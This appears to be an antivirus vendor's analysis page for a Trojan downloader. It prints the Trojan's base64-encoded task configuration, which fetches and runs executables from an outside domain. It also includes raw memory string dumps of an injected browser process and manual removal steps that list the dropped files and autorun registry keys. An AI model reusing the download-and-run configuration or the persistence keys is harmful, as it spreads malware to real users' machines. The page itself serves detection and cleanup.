Content-Type: text/html; charset=UTF-8PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IlNlY29uZEwiIHZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tL2Zy
b21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIH
NvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9
IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxNzA5MDEiLz4NCg0KPC9wZXJmb3Jt
Pg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbmUiIH
ZhbHVlPSI0NTE3MDkwMSIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwv
dGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJPbmVUd28iIH
ZhbHVlPSJodHRwOi8vYnJhdGl0bGFtaW8uY29tLzMvMDAwMDAwL3dpenpjYXN0ZXJfaW5z
dGFsbGVyX3YyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcmU9IiIgbmV0PSJ5ZXMiIC8 DQ
o8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iT25lVHdvIiB2YWx1ZT0ibm90d2FpdCIg
cGFyYW1zPSI1N2E3NjRkMDQyYmY4Ii8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iSGFoYS
IgdmFsdWU9IjAwMDE3MDkwMSIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0K
DQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJIYWhhIiB2YWx1ZT0iMTcwOTAxIiBtYXRjaD
0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KPC90YXNrPjx0YXNrPg0KDQo8cGVyZm9y
bT4NCg0KPGRvd25sb2FkIG5hbWU9IlNobzlsaWJpIiB2YWx1ZT0iaHR0cDovL2JyYXRpdG
xhbWlvLmNvbS9leGUvdXBkYXRlci5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5l
dD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IlNobzlsaWJpIiB2YW
x1ZT0id2FpdCIgcGFyYW1zPSJ3ZSIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9IkRhdGUi
IHZhbHVlPSJmZThmMTcwOTAxIi8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQ
oNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkRhdGUiIHZhbHVlPSIxNzA5MDEiIG1h<<< skipped >>>
The Trojan connects to the servers at the folowing location(s):
.text
`.data
.rsrc
@.reloc
Bv.TBv
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
iexplore.exe_3980:
.text
`.data
.rsrc
@.reloc
Bv.TBv
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
XF7UXTX5V.exe_2816_rwx_01720000_00010000:
%8Xyp
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
SecondL.exe:2700
Sho9libi.exe:600
OneTwo.exe:1712
%original file name%.exe:2948 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\0d3lro043kz\ik41xztlhxf.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\0d3lro043kz\ik41xztlhxf.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
%Program Files%\XF7UXTX5V5\uninstaller.exe (24113 bytes)
%Program Files%\XF7UXTX5V5\XF7UXTX5V.exe.config (1 bytes)
%Program Files%\XF7UXTX5V5\uninstaller.exe.config (1 bytes)
%Program Files%\XF7UXTX5V5\cast.config (36 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\Sho9libi.exe (240319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\OneTwo.exe (20577 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\SecondL.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\SecondL.exe.config (1 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"qqgism1kmmv" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\0d3lro043kz\ik41xztlhxf.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"V3D5001I9V3R52K" = "%Program Files%\XF7UXTX5V5\XF7UXTX5V.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_YV6PJ" = "C:\%original file name%.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.